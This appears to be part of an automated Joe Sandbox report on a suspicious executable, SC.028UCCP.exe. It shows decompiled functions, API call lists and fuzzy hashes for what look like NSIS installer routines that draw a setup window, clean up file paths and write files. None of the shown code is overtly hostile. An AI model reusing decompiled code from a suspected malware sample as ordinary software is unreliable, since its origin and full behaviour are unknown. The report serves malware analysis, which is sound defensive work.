[Rename], xrefs: 004059B2, 004059C4
%s=%s, xrefs: 0040592C

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 3756836283-4148678300
Opcode ID: 0e8e631bf26e18e4e01423c26e0453d2a1c56ec703afa11c132e8a2a2869d5ab
Instruction ID: 071f1bedc6bad253eda7905f96c0224db6c740fdd14e9da81140b4a3fca74d15
Opcode Fuzzy Hash: 0e8e631bf26e18e4e01423c26e0453d2a1c56ec703afa11c132e8a2a2869d5ab
Instruction Fuzzy Hash: 0841D471B04755AFD2206B619C89F6B7A5CEB85754F14053AFD01F72C2E678A8008EBD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42ebb0; // 0x651b28
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Bilsynssteder Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42eba8; // 0x2027e
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x00401019
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,?), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Bilsynssteder Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Bilsynssteder Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: Bilsynssteder Setup$F
API String ID: 941294808-2844915942
Opcode ID: ba4e0aeaea3a811c503903e6f7a1a9974574a5d0e3280e24df55959760edf428
Instruction ID: d739c411fb0a3510c8e8b782188d1d9e67e91bc4641c8cbf6c57472f1a226fbe
Opcode Fuzzy Hash: ba4e0aeaea3a811c503903e6f7a1a9974574a5d0e3280e24df55959760edf428
Instruction Fuzzy Hash: FA418A71804249AFCB05CF95DD459BFBFB9FF44310F00812AF962AA1A0C738AA51DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 1000236D Relevance: 15.1, APIs: 10, Instructions: 132
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000236D(void* __edx) {
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t24;
				short* _t25;
				void* _t26;
				void* _t31;
				void* _t33;
				void* _t35;
				void* _t37;
				void* _t41;
				void* _t44;
				int _t49;
				void* _t50;
				void* _t56;
				intOrPtr _t57;
				short** _t60;
				short** _t61;
				void* _t62;
				void* _t63;

				_t56 = __edx;
				_t19 =  *((intOrPtr*)(_t63 + 8));
				_t57 =  *((intOrPtr*)(_t19 + 0x814));
				 *((intOrPtr*)(_t63 + 0x10)) = _t57;
				_t60 = (_t57 + 0x41 << 5) + _t19;
				do {
					if( *((intOrPtr*)(_t60 - 4)) != 0xffffffff) {
						_t61 = _t60;
					} else {
						_t61 =  *_t60;
					}
					_t62 = E10001215();
					_t49 = 0;
					_t22 =  *((intOrPtr*)(_t60 - 8));
					if(_t22 == 0) {
						lstrcpyA(_t62, 0x10004034);
					} else {
						_t31 = _t22 - 1;
						if(_t31 == 0) {
							_push( *_t61);
							goto L12;
						} else {
							_t33 = _t31 - 1;
							if(_t33 == 0) {
								E10001446(_t56,  *_t61, _t61[1], _t62);
								goto L13;
							} else {
								_t35 = _t33 - 1;
								if(_t35 == 0) {
									lstrcpynA(_t62,  *_t61,  *0x1000405c);
								} else {
									_t37 = _t35 - 1;
									if(_t37 == 0) {
										WideCharToMultiByte(0, 0,  *_t61,  *0x1000405c, _t62,  *0x1000405c - 1, 0, 0);
										 *( *0x1000405c + _t62 - 1) =  *( *0x1000405c + _t62 - 1) & 0x00000000;
									} else {
										_t41 = _t37 - 1;
										if(_t41 == 0) {
											_t44 = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
											_t50 = _t44;
											__imp__StringFromGUID2( *_t61, _t50,  *0x1000405c);
											WideCharToMultiByte(0, 0, _t50,  *0x1000405c, _t62,  *0x1000405c, 0, 0);
											GlobalFree(_t50);
											_t49 = 0;
										} else {
											if(_t41 == 1) {
												_push( *_t60);
												L12:
												wsprintfA(_t62, 0x10004000);
												L13:
												_t63 = _t63 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					_t24 = _t60[5];
					if(_t24 != _t49 && ( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x18)))) != 2 ||  *((intOrPtr*)(_t60 - 4)) > _t49)) {
						GlobalFree(_t24);
					}
					_t25 = _t60[4];
					if(_t25 != _t49) {
						if(_t25 != 0xffffffff) {
							if(_t25 > _t49) {
								E100012E8(_t25 - 1, _t62);
								goto L29;
							}
						} else {
							E10001278(_t62);
							L29:
						}
					}
					_t26 = GlobalFree(_t62);
					 *((intOrPtr*)(_t63 + 0x10)) =  *((intOrPtr*)(_t63 + 0x10)) - 1;
					_t60 = _t60 - 0x20;
				} while ( *((intOrPtr*)(_t63 + 0x10)) >= _t49);
				return _t26;
			}

0x1000236d
0x1000236e
0x10002376
0x1000237c
0x10002386
0x10002388
0x1000238c
0x10002392
0x1000238e
0x1000238e
0x1000238e
0x10002399
0x1000239e
0x100023a0
0x100023a2
0x10002472
0x100023a8
0x100023a8
0x100023a9
0x10002465
0x00000000
0x100023af
0x100023af
0x100023b0
0x1000245b
0x00000000
0x100023b6
0x100023b6
0x100023b7
0x1000244d
0x100023bd
0x100023bd
0x100023be
0x10002432
0x1000243d
0x100023c0
0x100023c0
0x100023c1
0x100023ea
0x100023f6
0x100023fb
0x10002410
0x10002417
0x1000241d
0x100023c3
0x100023c4
0x100023ca
0x100023cc
0x100023d2
0x100023d8
0x100023d8
0x100023d8
0x100023c4
0x100023c1
0x100023be
0x100023b7
0x100023b0
0x100023a9
0x10002478
0x1000247d
0x1000248e
0x1000248e
0x10002494
0x10002499
0x1000249e
0x100024aa
0x100024af
0x00000000
0x100024b4
0x100024a0
0x100024a1
0x100024b5
0x100024b5
0x1000249e
0x100024b7
0x100024bd
0x100024c1
0x100024c4
0x100024d3

APIs

wsprintfA.USER32 ref: 100023D2
GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023EA
StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023FB
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002410
GlobalFree.KERNEL32(00000000), ref: 10002417

Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310

GlobalFree.KERNEL32(?), ref: 1000248E
GlobalFree.KERNEL32(00000000), ref: 100024B7

Memory Dump Source

Source File: 00000000.00000002.2999566321.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2999506923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999612936.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999647911.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_SC.jbxd

Similarity

API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
String ID:
API String ID: 2278267121-0
Opcode ID: 3ee0894ed4fe1b0af880131e50e06ec5e86c9efe6cc015858b811f9b411bf8ba
Instruction ID: 2b73d6ec50a8d2f500b210c633f34be0aa2160400c3477ecc395e3c682f4b703
Opcode Fuzzy Hash: 3ee0894ed4fe1b0af880131e50e06ec5e86c9efe6cc015858b811f9b411bf8ba
Instruction Fuzzy Hash: DE41ADB1109216EFF715DFA4CC88E2BBBECFB042D57124619FA51921A9DB35AC409B31

Uniqueness

Uniqueness Score: -1.00%

Function 00405E03 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E03(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056B2(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405670("*?|<>/\":", _t5))) == 0) {
							E00405801(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405e05
0x00405e0d
0x00405e21
0x00405e21
0x00405e27
0x00405e34
0x00405e34
0x00405e35
0x00405e37
0x00405e3b
0x00405e3d
0x00405e46
0x00405e48
0x00405e62
0x00405e6a
0x00405e6a
0x00405e6f
0x00405e71
0x00405e73
0x00405e77
0x00405e78
0x00405e7b
0x00405e83
0x00405e85
0x00405e89
0x00000000
0x00000000
0x00405e8f
0x00405e94
0x00000000
0x00000000
0x00000000
0x00405e94
0x00405e99

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,75DD3410,004032BD), ref: 00405E5B
CharNextA.USER32(?,?,?,00000000), ref: 00405E68
CharNextA.USER32(?,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,75DD3410,004032BD), ref: 00405E6D
CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,75DD3410,004032BD), ref: 00405E7D

Strings

*?|<>/":, xrefs: 00405E4B
C:\Users\user\AppData\Local\Temp\, xrefs: 00405E04, 00405E09
"C:\Users\user\Desktop\SC.028UCCP.exe", xrefs: 00405E3F

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3620280496
Opcode ID: ca421e288064bc83167a684e77603dc3b4a1af20f0b604c6044bfd7d30eb1efe
Instruction ID: fde9db7261816c846b9818803ccfda6df055d64d399c84b755319e1cb08c2998
Opcode Fuzzy Hash: ca421e288064bc83167a684e77603dc3b4a1af20f0b604c6044bfd7d30eb1efe
Instruction Fuzzy Hash: 8911C871804B9529EB3217389C44B777FC8CB567A0F18007BE5D5723C2D67C5E428AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00403F0F Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F0F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403f21
0x00403fb5
0x00000000
0x00403fb5
0x00403f32
0x00403f36
0x00000000
0x00000000
0x00403f3c
0x00403f45
0x00403f48
0x00403f48
0x00403f4e
0x00403f54
0x00403f54
0x00403f60
0x00403f66
0x00403f6d
0x00403f70
0x00403f73
0x00403f75
0x00403f75
0x00403f7d
0x00403f83
0x00403f83
0x00403f8d
0x00403f92
0x00403f95
0x00403f9a
0x00403f9d
0x00403f9d
0x00403fad
0x00403fad
0x00000000

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403F2C
GetSysColor.USER32(00000000), ref: 00403F48
SetTextColor.GDI32(?,00000000), ref: 00403F54
SetBkMode.GDI32(?,?), ref: 00403F60
GetSysColor.USER32(?), ref: 00403F73
SetBkColor.GDI32(?,?), ref: 00403F83
DeleteObject.GDI32(?), ref: 00403F9D
CreateBrushIndirect.GDI32(?), ref: 00403FA7

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction ID: 22809f81b89203674e666fe58c9753c9cc5a050007085b97ca1eded3a3c5a137
Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction Fuzzy Hash: 27219671904705ABCB219F78DD08B5BBFF8AF01715F048669F996E22E0D738EA08CB55

Uniqueness

Uniqueness Score: -1.00%

Function 100021AF Relevance: 10.6, APIs: 7, Instructions: 136
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E100021AF(void* __edx, intOrPtr _a4) {
				signed int _v4;
				CHAR* _t32;
				intOrPtr _t33;
				void* _t34;
				void* _t36;
				void* _t43;
				void** _t49;
				CHAR* _t58;
				void* _t59;
				signed int* _t60;
				void* _t61;
				intOrPtr* _t62;
				CHAR* _t63;
				void* _t73;

				_t59 = __edx;
				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t62 = (_v4 << 5) + _t9;
					_t32 =  *(_t62 + 0x14);
					if(_t32 == 0) {
						goto L9;
					}
					_t58 = 0x1a;
					if(_t32 == _t58) {
						goto L9;
					}
					if(_t32 != 0xffffffff) {
						if(_t32 <= 0 || _t32 > 0x19) {
							 *(_t62 + 0x14) = _t58;
						} else {
							_t32 = E100012BF(_t32 - 1);
							L10:
						}
						goto L11;
					} else {
						_t32 = E1000123B();
						L11:
						_t63 = _t32;
						_t13 = _t62 + 8; // 0x820
						_t60 = _t13;
						if( *((intOrPtr*)(_t62 + 4)) != 0xffffffff) {
							_t49 = _t60;
						} else {
							_t49 =  *_t60;
						}
						_t33 =  *_t62;
						 *(_t62 + 0x1c) =  *(_t62 + 0x1c) & 0x00000000;
						if(_t33 == 0) {
							 *_t60 =  *_t60 & 0x00000000;
						} else {
							if(_t33 == 1) {
								_t36 = E1000131B(_t63);
								L27:
								 *_t49 = _t36;
								L31:
								_t34 = GlobalFree(_t63);
								if(_v4 == 0) {
									return _t34;
								}
								if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
									_v4 = _v4 + 1;
								} else {
									_v4 = _v4 & 0x00000000;
								}
								continue;
							}
							if(_t33 == 2) {
								 *_t49 = E1000131B(_t63);
								_t49[1] = _t59;
								goto L31;
							}
							_t73 = _t33 - 3;
							if(_t73 == 0) {
								_t36 = E10001224(_t63);
								 *(_t62 + 0x1c) = _t36;
								goto L27;
							}
							if(_t73 > 0) {
								if(_t33 <= 5) {
									_t61 = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
									MultiByteToWideChar(0, 0, _t63,  *0x1000405c, _t61,  *0x1000405c);
									if( *_t62 != 5) {
										 *(_t62 + 0x1c) = _t61;
										 *_t49 = _t61;
									} else {
										_t43 = GlobalAlloc(0x40, 0x10);
										 *(_t62 + 0x1c) = _t43;
										 *_t49 = _t43;
										__imp__CLSIDFromString(_t61, _t43);
										GlobalFree(_t61);
									}
								} else {
									if(_t33 == 6 && lstrlenA(_t63) > 0) {
										 *_t60 = E100024D4(E1000131B(_t63));
									}
								}
							}
						}
						goto L31;
					}
					L9:
					_t32 = E10001224(0x10004034);
					goto L10;
				}
			}

0x100021af
0x100021c3
0x100021c7
0x100021d2
0x100021d2
0x100021d9
0x100021de
0x00000000
0x00000000
0x100021e2
0x100021e5
0x00000000
0x00000000
0x100021ea
0x100021f5
0x10002205
0x100021fc
0x100021fe
0x10002214
0x10002214
0x00000000
0x100021ec
0x100021ec
0x10002215
0x10002219
0x1000221b
0x1000221b
0x1000221e
0x10002224
0x10002220
0x10002220
0x10002220
0x10002226
0x10002228
0x1000222e
0x100022f9
0x10002234
0x10002237
0x100022f2
0x100022de
0x100022df
0x100022fc
0x100022fd
0x10002308
0x10002332
0x10002332
0x10002318
0x10002324
0x1000231a
0x1000231a
0x1000231a
0x00000000
0x10002318
0x10002240
0x100022ea
0x100022ec
0x00000000
0x100022ec
0x10002246
0x10002249
0x100022d6
0x100022db
0x00000000
0x100022db
0x1000224f
0x10002258
0x10002294
0x100022a3
0x100022ac
0x100022ce
0x100022d1
0x100022ae
0x100022b2
0x100022b9
0x100022bd
0x100022bf
0x100022c6
0x100022c6
0x1000225a
0x1000225d
0x1000227f
0x10002281
0x1000225d
0x10002258
0x1000224f
0x00000000
0x1000222e
0x1000220a
0x1000220f
0x00000000
0x1000220f

APIs

lstrlenA.KERNEL32(?), ref: 10002264
GlobalAlloc.KERNEL32(00000040,?), ref: 1000228E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022A3
GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022B2
CLSIDFromString.OLE32(00000000,00000000), ref: 100022BF
GlobalFree.KERNEL32(00000000), ref: 100022C6
GlobalFree.KERNEL32(00000000), ref: 100022FD

Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234

Memory Dump Source

Source File: 00000000.00000002.2999566321.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2999506923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999612936.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999647911.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_SC.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
String ID:
API String ID: 3955009414-0
Opcode ID: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
Instruction ID: a605aeec0f08bdd00b0ee3428b37a4786007c3c680f5ed26bc2609ce7b065058
Opcode Fuzzy Hash: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
Instruction Fuzzy Hash: 5741AD70504306EFF364DFA48984B6BB7F8FB453E1F21492AF956C619ADB30A840DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0040268D Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040268D(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E00402A07(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004056B2(_t52) == 0) {
					E00402A07(0xffffffed);
				}
				E00405821(_t52);
				_t27 = E00405846(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42ebb4; // 0x8c00
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030C0(_t47);
						E0040308E(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x2c) = _t56;
						if(_t56 != _t47) {
							E00402E6C( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E00405801( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x2c));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402E6C(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x0040268d
0x0040268f
0x0040269b
0x0040269e
0x004026a8
0x004026ac
0x004026ac
0x004026b2
0x004026bf
0x004026c7
0x004026ca
0x004026d0
0x004026de
0x004026e3
0x004026e7
0x004026ea
0x004026f3
0x004026ff
0x00402703
0x00402706
0x00402710
0x0040272f
0x00402717
0x0040271c
0x00402724
0x00402727
0x0040272c
0x0040272c
0x00402736
0x00402736
0x00402748
0x0040274f
0x00402761
0x00402761
0x00402767
0x00402767
0x00402772
0x00402773
0x00402777
0x0040277b
0x00402781
0x00402781
0x00402788
0x0040217a
0x0040289f
0x004028ab

APIs

GlobalAlloc.KERNEL32(00000040,00008C00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026E1
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026FD
GlobalFree.KERNEL32(?), ref: 00402736
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402748
GlobalFree.KERNEL32(00000000), ref: 0040274F
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402767
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040277B

Memory Dump Source

